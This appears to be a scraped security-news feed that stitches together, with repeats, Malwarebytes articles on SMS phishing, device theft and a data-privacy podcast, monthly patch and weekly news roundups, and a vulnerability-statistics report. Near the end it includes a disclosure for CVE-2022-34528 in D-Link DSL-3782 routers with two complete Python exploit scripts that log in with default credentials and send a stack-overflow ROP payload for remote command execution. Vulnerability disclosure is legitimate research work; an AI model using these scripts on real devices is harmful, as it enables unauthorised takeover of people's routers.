Categories: News
Tags: PII

Tags: smishing

Tags: FCC

Tags: SMS phishing

Tags: Robokiller

Tags: STIR

Tags: SHAKEN

Smishing attacks, or phishing attempts via SMS, are on the rise, and Americans are fighting off billions of spam messages each month.



(Read more...)




The post FCC warns of steep rise in phishing over SMS appeared first on Malwarebytes Labs.

After the FCC (Federal Communications Commission) made a huge splash weeks ago when it told Google and Apple to pull TikTok from their respective app stores, the federal agency is now warning Americans of an increased wave of SMS phishing attacks.

SMS phishing, otherwise known as smishing or robotexts (FCC’s own terminology), is a form of phishing that attempts to trick people into handing over their personally identifiable information (PII) and/or money using SMS instead of email, which standard phishing usually starts. The FCC has noted that scammers use various lures to trick someone into replying, giving out their information, or clicking a link.

“Like robocallers, a robotexter may use fear and anxiety to get you to interact,” the FCC consumer alert reads. “Texts may include false-but-believable claims about unpaid bills, package delivery snafus, bank account problems or law enforcement action against you. They may provide confusing information—as if they were texting someone else—, incomplete information, or utilize other techniques to spur your curiosity and engagement.”

What motivates criminals to engage in smishing tactics is to get money and personal information or to simply confirm that the number they’re messaging is active, so they can target it in future scam campaigns.

According to the FCC, it tracks consumer complaints instead of text volume. The agency noted a steady climb of unwanted SMS messages, from approximately 5,700 in 2019 to 8,500 by June 30, 2022. 

A separate study confirmed this, too, but revealed more sobering numbers. RoboKiller, an app that screens scammy calls and messages, found that Americans were sent a mind-blowing 12 billion spam texts in July 2022.

“That’s nearly **_44 spam texts_** for every person in the country!” And the numbers were no different in June and May 2022.

RoboKiller also pointed out in the report that spam texts have outpaced spam calls for two consecutive years. And one of the notable reasons for this is the FCC mandating the STIR (Secure Telephone Identity Revisited) and SHAKEN (Signature-based Handling of Asserted information using toKENs) framework, which was designed to curb spam calls. It’s effective, which is why scammers switched to spam texts.

The FCC posted bite-sized, back-to-back tweets on signs of scam text messages and how Americans can avoid getting scammed.

> How to protect yourself from #scam robotexts:  
> ▪️ Do not respond  
> ▪️ Do not click on any links  
> ▪️ Do not provide any info  
> ▪️ File an FCC complaint  
> ▪️ Forward unwanted texts to SPAM (7726)  
> ▪️ Delete all suspicious texts
> 
> — The FCC (@FCC) July 28, 2022

When you receive a spam text, do not engage with the sender.

Ignore them, but file a complaint to the FCC.

Finally, if you think you were the victim of an SMS text scam, the FCC recommends you report the incident to your local law enforcement agency and notify your bank and mobile carrier.

Stay safe!

FCC warns of steep rise in phishing over SMS

We give you some tips as you gear up to return to school or college to ward off theft, and limit the impact should the worst happen.
The post How to protect yourself and your kids against device theft appeared first on Malwarebytes Labs.

Posted: August 3, 2022 by  
Last updated: July 21, 2022

In no time at all, kids will be going back to school or starting college. And while gearing up for this, it’s very important to be aware of the threat from device loss in the school environment.

Maybe you are away at university for the first time and have a new place to live, or maybe your kids have devices they take into school. Whatever the reason, if you lose a device or it gets stolen, the end result can be quite serious—from loss of sensitive data, wasted time and misplaced work, to blackmail or harassment if the data is unencrypted.

And it’s not just one piece of technology to worry about. Students are likely to own tablets, laptops, and mobile phones at the bare minimum. It’s tricky to juggle all the potential privacy and security pitfalls when dealing with so many pieces of technology…but it can be done!

**How to protect yourself against mobile device theft**

A phone is much easier to lose track of in school or on campus than a much larger device like a laptop. It’s also a great target for thieves for precisely the same reason. Depending on the model, your device likely contains a wealth of security options. Here’s what you can do in advance to take the sting out of a mobile theft.

*   **Lock your device**. Your lockscreen should serve as the barrier between you and your data. This is because it’ll also serve as the barrier between your device and other people. Protect it with a passcode, or biometrics (such as your thumbprint, your faceprint, or even a scan of your eye). Should someone steal your phone or simply pick it up off the ground after you drop it, they won’t be able to access your data.
*   **Encrypt your data**. If your device isn’t encrypted, the information on it is potentially at risk if the phone is stolen. Once encrypted, everything on the device is scrambled in a way which requires the correct PIN to access the secured data. Older versions of Android used something called Full-Disk encryption. Newer versions use File-based encryption. iPhones and iPads have encryption as standard when using Face or Touch ID, or a passcode. You can check by going to **Settings > Face ID/TouchID & Passcode**. If you scroll to the bottom you should see “Data Protection is enabled”
*   **Turn on Find my phone**. This option is hidden away in the security settings of most Androids, and you may need to dig around a little to find it. It does what it suggests, using a combination of several forms of technology to locate the missing device. On Apple products, it’s likely to be turned on by default, but you can check by navigating to the “Find My” app.

**How to protect yourself against laptop theft**

Laptops aren’t quite as easy to make disappear as a mobile device, but it does happen! Here are some of the ways you can prevent laptop theft while on campus or out and about between classes.

*   **Don’t neglect physical security**. Never leave your laptop bag unattended, even for a second. Going back to the counter for another coffee? Take it with you. Need to go to the bathroom? Pack your laptop away, and take it with you. Sitting at a table with your bag on the floor? Put one foot through the laptop bag’s strap, so if someone tries to snatch it they won’t be able to.
*   **Observe campus rules**. If the laptop you’re using is campus supplied, the device may be encrypted by default. There may well be security tools present to help fend off potential malware infections, but there may be nothing available to remedy loss or theft, such as location tracking. While it may be tempting to install a third-party tracking tool, your school or university will have policies with regard to what you can, or cannot, install. If in doubt, ask IT for assistance.
*   **Encrypt your device (again**). If you’re using a Windows operating system, you have a couple of options available. You could, for example, make use of BitLocker. If you’re running Windows Home, you may well have to consider using a third-party alternative because BitLocker isn’t available. On Macs, you can use FileVault to encrypt your device.
*   **Turn on Find your device**. This works in a similar fashion to trace tools for lost mobiles and should be set up when you first get your device. On Windows, navigate to **Start** > **Settings** > **Update & Security** > **Find my device**, and then select “**Change**” to finish configuring. On Mac, navigate to **System Preferences > AppleID > iCloud**. Select **Find My Mac** and click **Allow**.

****A tip for both mobiles and laptops****

No matter what you’re taking on campus, remember to backup your data. Device loss is bad enough, but losing everything on the device makes it even worse. Get into the routine of backing up data daily.

Your mobile may also have the option of cloud backups. Take care to check how the data is stored, if it’s encrypted, and if it eventually expires. There may well be a limited amount of space available, or it could eat into some of your data allowance.

There are more options on the desktop. You could use removable storage, additional hard drives, local desktop backups, and more. There are also various cloud-based options available like Dropbox and Google Drive, and it’s worth noting that many of these services will also work on mobile too.

**RELATED ARTICLES**

September 2, 2020 - With the pandemic in full swing, many US schools are empty, or rather, full of distance learners. How can parents make sure their kids stay secure in virtual instruction?

September 9, 2019 - A roundup of the latest cybersecurity news for the week of September 2 – 8, including TrickBot’s new trick, a social engineering toolkit, and how to keep remote workers safe.

August 14, 2017 - When you buy your child new devices, it's important to lay down some ground rules—especially when it comes to security. That's why we're providing you with a cybersecurity checklist you can use to prepare your children for the coming school year.

August 15, 2015 - Ahhhhh, back-to-school. The smell of freshly sharpened pencils. Blank notebooks and backpacks free of bottom-of-the-bag schmutz. New books with crackling spines. And, most importantly, your very own computer. Owning your own computer is a huge investment. It’ll hold all of your schoolwork, your photos, your browsing history. You don’t have to worry about clearing the...

**ABOUT THE AUTHOR**

Christopher Boyd  
Lead Malware Intelligence Analyst

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.

How to protect yourself and your kids against device theft

Categories: Awareness
Tags: back to school

Tags: device

Tags: encryption

Tags: Mobile

Tags: school

Tags: theft

Tags: university

We give you some tips as you gear up to return to school or college to ward off theft, and limit the impact should the worst happen.



(Read more...)




The post How to protect yourself and your kids against device theft appeared first on Malwarebytes Labs.

In no time at all, kids will be going back to school or starting college. And while gearing up for this, it’s very important to be aware of the threat from device loss in the school environment.

Maybe you are away at university for the first time and have a new place to live, or maybe your kids have devices they take into school. Whatever the reason, if you lose a device or it gets stolen, the end result can be quite serious—from loss of sensitive data, wasted time and misplaced work, to blackmail or harassment if the data is unencrypted.

And it's not just one piece of technology to worry about. Students are likely to own tablets, laptops, and mobile phones at the bare minimum. It’s tricky to juggle all the potential privacy and security pitfalls when dealing with so many pieces of technology…but it can be done!

**How to protect yourself against mobile device theft**

A phone is much easier to lose track of in school or on campus than a much larger device like a laptop. It’s also a great target for thieves for precisely the same reason. Depending on the model, your device likely contains a wealth of security options. Here’s what you can do in advance to take the sting out of a mobile theft.

*   **Lock your device**. Your lockscreen should serve as the barrier between you and your data. This is because it’ll also serve as the barrier between your device and other people. Protect it with a passcode, or biometrics (such as your thumbprint, your faceprint, or even a scan of your eye). Should someone steal your phone or simply pick it up off the ground after you drop it, they won’t be able to access your data.
*   **Encrypt your data**. If your device isn’t encrypted, the information on it is potentially at risk if the phone is stolen. Once encrypted, everything on the device is scrambled in a way which requires the correct PIN to access the secured data. Older versions of Android used something called Full-Disk encryption. Newer versions use File-based encryption. iPhones and iPads have encryption as standard when using Face or Touch ID, or a passcode. You can check by going to **Settings > Face ID/TouchID & Passcode**. If you scroll to the bottom you should see "Data Protection is enabled"
*   **Turn on Find my phone**. This option is hidden away in the security settings of most Androids, and you may need to dig around a little to find it. It does what it suggests, using a combination of several forms of technology to locate the missing device. On Apple products, it's likely to be turned on by default, but you can check by navigating to the "Find My" app.

**How to protect yourself against laptop theft**

Laptops aren’t quite as easy to make disappear as a mobile device, but it does happen! Here are some of the ways you can prevent laptop theft while on campus or out and about between classes.

*   **Don’t neglect physical security**. Never leave your laptop bag unattended, even for a second. Going back to the counter for another coffee? Take it with you. Need to go to the bathroom? Pack your laptop away, and take it with you. Sitting at a table with your bag on the floor? Put one foot through the laptop bag’s strap, so if someone tries to snatch it they won’t be able to.
*   **Observe campus rules**. If the laptop you’re using is campus supplied, the device may be encrypted by default. There may well be security tools present to help fend off potential malware infections, but there may be nothing available to remedy loss or theft, such as location tracking. While it may be tempting to install a third-party tracking tool, your school or university will have policies with regard to what you can, or cannot, install. If in doubt, ask IT for assistance.
*   **Encrypt your device (again**). If you’re using a Windows operating system, you have a couple of options available. You could, for example, make use of BitLocker. If you’re running Windows Home, you may well have to consider using a third-party alternative because BitLocker isn’t available. On Macs, you can use FileVault to encrypt your device.
*   **Turn on Find your device**. This works in a similar fashion to trace tools for lost mobiles and should be set up when you first get your device. On Windows, navigate to **Start** > **Settings** > **Update & Security** > **Find my device**, and then select “**Change**” to finish configuring. On Mac, navigate to **System Preferences > AppleID > iCloud**. Select **Find My Mac** and click **Allow**.

****A tip for both mobiles and laptops****

No matter what you’re taking on campus, remember to backup your data. Device loss is bad enough, but losing everything on the device makes it even worse. Get into the routine of backing up data daily.

Your mobile may also have the option of cloud backups. Take care to check how the data is stored, if it’s encrypted, and if it eventually expires. There may well be a limited amount of space available, or it could eat into some of your data allowance.

There are more options on the desktop. You could use removable storage, additional hard drives, local desktop backups, and more. There are also various cloud-based options available like Dropbox and Google Drive, and it’s worth noting that many of these services will also work on mobile too.

PyroCMS v3.9 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

CVE-2022-35118: AARO-Bugs/AARO-CVE-List.md at master · Accenture/AARO-Bugs

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 
The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we’re bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court’s decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google’s all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn’t just because so much of our data is tracked today, but that we currently don’t know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today’s fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

March 7, 2022 - The most important and interesting security stories from the last seven days.

February 28, 2022 - This week on Lock and Code, we discuss Crisis Text Line's data-sharing agreement with its for-profit partner, which has upset many people.

Have we lost the fight for data privacy? Lock and Code S03E16

Categories: Podcast
Tags: Data privacy

Tags: facebook

Tags: Google

Tags: lock and code

Tags: lock and code podcast

Tags: malwarebytes labs

Tags: podcast

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 



(Read more...)




The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we're bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court's decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google's all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn't just because so much of our data is tracked today, but that we currently don't know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today's fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.

July has been a month of important updates, including patches for already-exploited vulnerabilities in Microsoft and Google products. This month also saw the first Apple iOS update in eight weeks, fixing dozens of security flaws in iPhones and iPads.

Security vulnerabilities continue to hit enterprise products, too, with July patches issued for SAP, Cisco, and Oracle software. Here’s what you need to know about the vulnerabilities fixed in July.

Apple iOS 15.6

Apple has released iOS and iPadOS 15.6 to fix 37 security flaws, including an issue in Apple File System (APFS) tracked as CVE-2022-32832. If exploited, the vulnerability could allow an app to execute code with kernel privileges, according to Apple’s support page, giving it deep access to your device.

Other iOS 15.6 patches fix vulnerabilities in the kernel and WebKit browser engine, as well as flaws in IOMobileFrameBuffer, Audio, iCloud Photo Library, ImageIO, Apple Neural Engine, and GPU Drivers.

Apple isn’t aware of any of the patched flaws being used in attacks, but some of the vulnerabilities are pretty serious—especially those affecting the kernel at the heart of the operating system. It’s also possible for vulnerabilities to be chained together in attacks, so make sure you update as soon as possible.

The iOS 15.6 patches were released alongside watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, macOS Big Sur 11.6.8, and macOS Catalina 10.15.7 2022-005.

Google Chrome

Google released an emergency patch for its Chrome browser in July, fixing four issues, including a zero-day flaw that has already been exploited. Tracked as CVE-2022-2294 and reported by Avast Threat Intelligence researchers, the memory corruption vulnerability in WebRTC was abused to achieve shellcode execution in Chrome’s renderer process.

The flaw was used in targeted attacks against Avast users in the Middle East, including journalists in Lebanon, to deliver spyware called DevilsTongue.

Based on the malware and tactics used to carry out the attack, Avast attributes the use of the Chrome zero-day to Candiru, an Israel-based company that sells spyware to governments.

Microsoft’s Patch Tuesday

Microsoft’s July Patch Tuesday is a big one, fixing 84 security issues including a flaw already being used in real-world attacks. The vulnerability, CVE-2022-22047, is a local privilege escalation flaw in the Windows Client/Server Runtime Subsystem (CSRSS) server and client Windows platforms, including the latest Windows 11 and Windows Server 2022 releases. An attacker able to successfully exploit the vulnerability could gain System privileges, according to Microsoft.

Of the 84 issues patched in Microsoft’s July Patch Tuesday, 52 were privilege escalation flaws, four were security feature bypass vulnerabilities, and 12 were remote code execution issues.

Microsoft security patches do sometimes cause other issues, and the July update was no different: Following the release, some users found MS Access runtime applications did not open. Thankfully, the firm is rolling out a fix.

Android July Security Bulletin

Google has released July updates for its Android operating system, including a fix for a critical security vulnerability in the System component that could lead to remote code execution with no additional privileges needed.

Google also fixed serious issues in the kernel–which could result in information disclosure—and the framework, which could lead to local privilege escalation. Meanwhile, vendor-specific patches from MediaTek, Qualcomm, and Unisoc are available if your device is using those chips. Samsung devices are starting to receive the July patch, and Google also released updates for its Pixel range.

SAP

Software maker SAP has issued 27 new and updated security notes as part of its July Security Patch Day, fixing multiple high-severity vulnerabilities. Tracked as CVE-2022-35228, the most serious issue is an information disclosure flaw in the central management console of the vendor’s Business Objects platform.

The vulnerability allows an unauthenticated attacker to gain token information over the network, according to security firm Onapsis. “Fortunately, an attack like this would require a legitimate user to access the application,” the firm adds. However, it’s still important to patch as soon as possible.

Oracle

Oracle has issued 349 patches in its July 2022 Critical Patch Update, including fixes for 230 flaws that can be exploited remotely.

Oracle’s April Patch Update included 520 security fixes, some of which addressed CVE-2022-22965, aka Spring4Shell, a remote code execution flaw in the spring framework. Oracle’s July update continues to address this issue.

Apple Just Patched 37 iPhone Security Bugs

Plus: Google delays the end of cookies (again), EU officials were targeted with Pegasus spyware, and more of the top security news.

Russia’s full-scale invasion of Ukraine has been ongoing for more than 150 days, with no end to the conflict in sight. While Ukrainian troops are having some success with counteroffensives in the south of the country, the war is having long-lasting impacts on freedom of speech and online censorship.

This week, we documented how a flurry of more than half a dozen new Russian laws, all proposed or passed in recent months, will help to separate Russia from the global internet. The move, if successful, could damage the very idea of the free and open internet and have global ramifications. But it is not all bad news. Russia’s attempts to block and censor people’s online lives are hitting some stumbling blocks: Its long-held ambition to block anonymity service Tor is faltering.

Last month, Joe Biden signed the Bipartisan Safer Communities Act, the first major federal gun law passed in years. However, senators lacked any real government data on gun violence when they were drafting the law, in part because, until 2019, the Centers for Disease Control and Prevention was banned for decades from studying gun violence in America. As a result, much of the data used to inform the Act came from elsewhere. We also looked at whether states could legally block people seeking abortions from crossing state lines to do so following the fall of _Roe v. Wade_.

Elsewhere, we’ve also put together a guide to how you can safely lend your phone to someone else, whether to a friend who wants to look at your holiday photos or a stranger who needs to make an emergency phone call. A few simple tweaks to your iPhone or Android settings can quickly help to secure your data.

And there’s more. Each week we round up the news that we didn’t break or cover in depth. Click on the headlines to read the full stories. And stay safe out there!

Every year, the list of companies getting hacked or suffering data breaches continues to grow. These incidents are often the result of businesses’ technical misconfigurations or poor security practices. While each incident is different, it is undeniable that data breaches can have huge impacts on those impacted: individuals who have their data leaked, for example, and companies who have to deal with reputation and financial damage. This week, an IBM report revealed that the cost of a data breach in 2022 has reached an “all-time high,” averaging $4.35 million. That’s a 2.6 percent increase from last year.

Perhaps more salient, according to IBM’s data, is that companies are hitting their customers with the costs of data breaches. The company surveyed 550 organizations that had suffered a data breach between March 2021 and March 2022, and 60 percent of them said they had increased their prices as a result of the breach. No specific examples were given in the report. And it’s unclear whether companies passing on the costs of cybersecurity incidents are investing that extra income into better protecting their customer’s data in the future. However, according to IBM, only 17 percent of the 550 companies surveyed said it was the first data breach they had suffered.

Another week, another set of spyware bombshells. This week Reuters revealed that the European Union found evidence that phones belonging to its staff were targeted with Pegasus, the powerful hacking tool of Israeli firm NSO Group. EU Justice Commissioner Didier Reynders was apparently told by Apple that his iPhone may have been hacked in 2021. An ongoing EU investigation, according to Reuters, found indicators of compromise on some devices. It follows officials announcing that 14 EU member states have purchased Pegasus in the past.

That was not the only spyware revelation this week. The leader of Greece’s opposition political party launched a complaint alleging his phone had been targeted with Israeli-made Predator spyware, developed by Cytrox. Microsoft also linked spyware, dubbed Subzero, to European firm DSIRF. The details, published to coincide with a spyware hearing of the House Intelligence Committee, claimed Subzero had been used to target banks and consultancy firms in Austria, the UK, and Panama.

If technology companies want to operate in China and sell their products to a market of more than a billion people, they’re going to have to bend to the rules. Firms are required to store data locally and, as Apple learned, may have to compromise the security protections they put in place around people’s data. As the video game _Roblox_ prepared to launch in China in 2017 and 2018, its developer was well aware of the potential consequences.

According to _Roblox_ documents obtained by VICE, the company believed it could be hacked if it entered China and that rivals would create their own version of its game. “Expect that hacking has already started,” an internal presentation in 2017 said. The documents also show how _Roblox_ applied Chinese censorship laws—“illegal content” included tampering with historical facts and misrepresenting Chinese territories on maps—and other local laws, such as collecting players’ real names. _Roblox_ eventually launched its Chinese app LuoBuLesi in July 2021, but shut it down at the start of this year.

For years, Apple’s Safari and Mozilla’s Firefox browsers have limited how third-party cookies can track you across the web. These small snippets of code, which are saved to your device when you visit websites, are able to track your browsing history and show you ads based on what you’ve seen. They’re widely considered a privacy nightmare. So when Google announced, in January 2020, that Chrome would finally ditch creepy third-party cookies by 2022, the move was a big deal. However, in practice, Google has struggled to make the change. This week, Google announced its plan has been delayed for a second time. Third-party cookies have been given a stay of execution until at least the backend of 2024, when they will start to be phased out. So far, Google’s efforts to replace third-party cookies have been turbulent, with privacy advocates claiming the replacements are worse than cookies, and the advertising industry saying they’ll decrease competition.

You Pay More When Companies Get Hacked

D-Link DSL-3782 v1.03 and below was discovered to contain a stack overflow via the function getAttrValue.

Vendor of the products:　D-Link

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　DSL-3782 v1.01, DSL-3782 v1.03

**Buffer overflow****Code in cfg\_manager**

Code bellow (in cfg\_manager) performs the traceroute (or ping) test in the Diagnostic webpage.

The _getAttrValue_ method at .text: 0x474bA4 can lead to a stack-based buffer overflow.

**Code in getAttrValue**

The dst parameter (a4) of strcpy corresponds to the $a3 register in the above picture, which comes from the $s1 register, and the $s1 register stores an offset address in stack (at .text: 474af0).

**In v1.01****exp**

import requests
import urllib
from pwn import \*

context.binary \= "../\_DSL-3782\_A1\_EU\_1.01\_07282016.bin.extracted/squashfs-root/userfs/bin/cfg\_manager"
context.endian \= "big"
context.arch \= "mips"

main\_url \= "http://192.168.1.1:80"

def login():
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        }
    url \= main\_url + "/cgi-bin/Login.asp?User=admin&Pwd=admin&\_=1640832458081"
    resp \= s.get(url,headers\=headers,timeout\=10)
    print resp.text

def get\_session\_key():
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        }
    url \= main\_url + "/cgi-bin/get/New\_GUI/get\_sessionKey.asp"
    resp \= s.get(url,headers\=headers,timeout\=10)
    sessionKey \= resp.text
    return sessionKey

def exp(sessionKey\=None):
    libc\_base \= 0x2b50b000
    system\_offset \= 0x59bb0
    system\_addr \= libc\_base + system\_offset
    gadget\_offset \= 0x0001656C
    gadget\_addr \= libc\_base + gadget\_offset

    cmd \= "echo yab. > /tmp/1"
    padding \= "a" \* 72
    s0 \= p32(system\_addr)
    s1 \= "AAAA"
    s2 \= "BBBB" 
    s3 \= "CCCC"
    ra \= p32(gadget\_addr)
    padding2 \= "A" \* 16
    payload \= padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd

    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
        }
    params \= {
        "Type":"p", "sessionKey":urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
        }
    url \= main\_url + "/cgi-bin/New\_GUI/Set/Diagnostics.asp"
    resp \= s.post(url,data\=params,headers\=headers,timeout\=10)
    print resp.text

if \_\_name\_\_ \== '\_\_main\_\_':
    login()
    sessionKey \= get\_session\_key()
    exp(sessionKey\=sessionKey) 

**Attack effect**

Since the command we executed in the exploit script (line 41) is echo yab. > /tmp/1, we can confirm that our attack was successful by printing the content in file /tmp/1.

**In v1.03**

An authenticated attacker can still use the stack-based bof to complete remote code execution of single-word commands (such as reboot).

**exp**

import requests
import urllib
from pwn import \*
import os
from time import sleep

context.binary \= "../new/\_DSL-3782\_A1\_EU\_1.03\_04042018.bin.extracted/squashfs-root/userfs/bin/cfg\_manager"
context.endian \= "big"
context.arch \= "mips"

server \= "192.168.1.1"
main\_url \= "http://192.168.1.1:80"

def get\_session\_key(a):
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        "Cookie": "SESSIONID\_AUTH=%s" % a
        }
    url \= main\_url + "/cgi-bin/get/New\_GUI/get\_sessionKey.asp"
    resp \= s.get(url,headers\=headers,timeout\=10)
    sessionKey \= resp.text
    print(sessionKey)
    return sessionKey

def exp(sessionKey\=None,a\=''):
    libc\_base \= input('libc\_base:')
    system\_offset \= 0x59bb0
    system\_addr \= libc\_base + system\_offset
    gadget\_offset \= 0x0001656C
    gadget\_addr \= libc\_base + gadget\_offset

    cmd \= "reboot"
    padding \= "a" \* 72
    s0 \= p32(system\_addr)
    s1 \= "AAAA"
    s2 \= "BBBB" 
    s3 \= "CCCC"
    ra \= p32(gadget\_addr)
    padding2 \= "A" \* 16
    payload \= padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd

    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        "Cookie": "SESSIONID\_AUTH=%s" % a
        }
    params \= {
        "Type":"t", "sessionKey":urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
        }
    url \= main\_url + "/cgi-bin/New\_GUI/Set/Diagnostics.asp"
    resp \= s.post(url,data\=params,headers\=headers,timeout\=10)
    print resp.text

if \_\_name\_\_ \== '\_\_main\_\_':
    print '\\n\[\*\] Connection %r' % main\_url
    a \= input()
    print '\[\*\] Getting session key'
    sessionKey \= get\_session\_key(a)
    print '\[\*\] Sending payload'
    exp(sessionKey\=sessionKey, a\=a) 
    sleep(1)
    print '\[\*\] Rebooting the target!'
    sleep(2)
    print '\[\*\] Done!'

**Attack effect**

Since the command we executed in the exploit script (line 37) is reboot , you can see that the emulator (firmadyne) is rebooting.

CVE-2022-34528: Vuls/BOF_in_D-Link DSL-3782.md at main · 1160300418/Vuls

The first half of the year saw more than 11,800 reported security vulnerabilities, but figuring out which ones to patch first remains a thankless job for IT teams.

The number of vulnerabilities disclosed in the first half of the year topped 11,800, forcing companies to determine the impact of an average of 90 security issues per weekday.

The numbers are from cybersecurity firm Flashpoint's "The State of Vulnerability Intelligence — 2022 Midyear Edition" report, which notes that the massive number of vulnerabilities reported in the first half of the year highlights the problems facing companies as they try to triage software security issues and determine which software updates to prioritize. 

Without better guidance, organizations attempting to sort through the security issues struggle to separate those that are highly critical from minor vulnerabilities and those that may not affect their environment at all, says Brian Martin, vice president of vulnerability intelligence at Flashpoint.

"There are some issues that will have no bearing on any real organization in the world — it might be a vulnerability in some Chinese blog that has seven installs worldwide," Martin says. "On the other hand, we do have vulnerabilities in Microsoft products, Google products, Apple products. Stuff that is just as high-profile and concerning as any issue from a Patch Tuesday."  

    

Daily vulnerability volumes in the first half of 2022. Source: Flashpoint

Clouding the issue is the focus put on zero-day vulnerabilities, those labeled as "discovered in the wild" by researchers before a patch is available. These are difficult to collect information on. Google's Project Zero documented 20 such vulnerabilities exploited in the wild in the first half of 2022, while Flashpoint found at least 17 more issues.

Yet the most common attacks usually use known vulnerabilities.

